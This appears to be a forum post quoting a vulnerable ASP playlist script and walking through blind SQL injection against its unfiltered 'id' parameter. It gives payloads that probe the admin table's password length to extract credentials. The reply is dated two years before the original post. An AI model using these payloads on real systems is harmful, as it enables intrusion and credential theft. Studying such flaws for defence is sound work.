Server maintenance, managed server operations, security configuration, vulnerability scanning, intrusion detection services

dirtysea posted on 2008-3-16 04:43:43

A piece of ASP code with an injection vulnerability

Someone sent me a piece of code.

The following is the quoted snippet:

<!--#include file="../user/conn.asp"-->
<!--#include file="Path.Asp"-->
<ASX version = "3.0">
<%
id1=replace(request("id"),"","")
if id1<>"" then
set rs=server.createobject("adodb.recordset")
id=id1
sql="select * from MusicList where id in (" & id & ")"
rs.open sql,conn,1,3
rs("hits")=rs("hits")+1
rs.update
songpath=rs("song_path")
    If songpath="" or IsNull(songpath) Then
      songpath=1
    End If
    select Case songpath
      Case 1
        song_path=song_path1
      Case 2
        song_path=song_path2
      Case 3
        song_path=song_path3
      Case 4
        song_path=song_path4
      Case 5
        song_path=song_path5
      Case 6
        song_path=song_path6
      Case 7
        song_path=song_path7
    End select
    song_path=song_path&rs("Wma")

while not rs.eof
%>
<entry SKIPIFREF="NO">
<title><%=rs("Musicname")%></title>
<author>www.lgrx.com.cn</author>
<copyright>歌手和唱片公司所有</copyright>
<ref href="<%=song_path%>"/>
<param name="Artist" value="<%=rs("Singer")%>"/>
<param name="Album" value="娱人音乐网 <%=rs("hits")%>人气"/>
<param name="Title" value="<%=rs("Musicname")%>"/>
</ENTRY>
<%
rs.movenext
wend
rs.Close
set rs=nothing
end if
conn.close
set conn=nothing
%>
</ASX>

Note the id: it goes into the SQL statement basically unfiltered. Simple, right? But:
rs("hits")=rs("hits")+1
rs.update

this means a UNION query won't work, because the result of a UNION is not updatable. So only classic injection is left:
id=1) sql and 1 in (1

The parts at the front and back make sure records come back; put our own SQL statement in the middle and it injects. The key table here is admin, with the fields password and username.

So you can do this:
id=1) and (select top 1 len(password) from admin)=16 and 1 in (1

It returns normally, so the statement is true, which suggests the password was probably MD5-hashed.

I won't go into the rest; figure it out yourself.

dirtysea posted on 2006-6-8 20:59:21

re: A piece of ASP code with an injection vulnerability

Support, hurrah!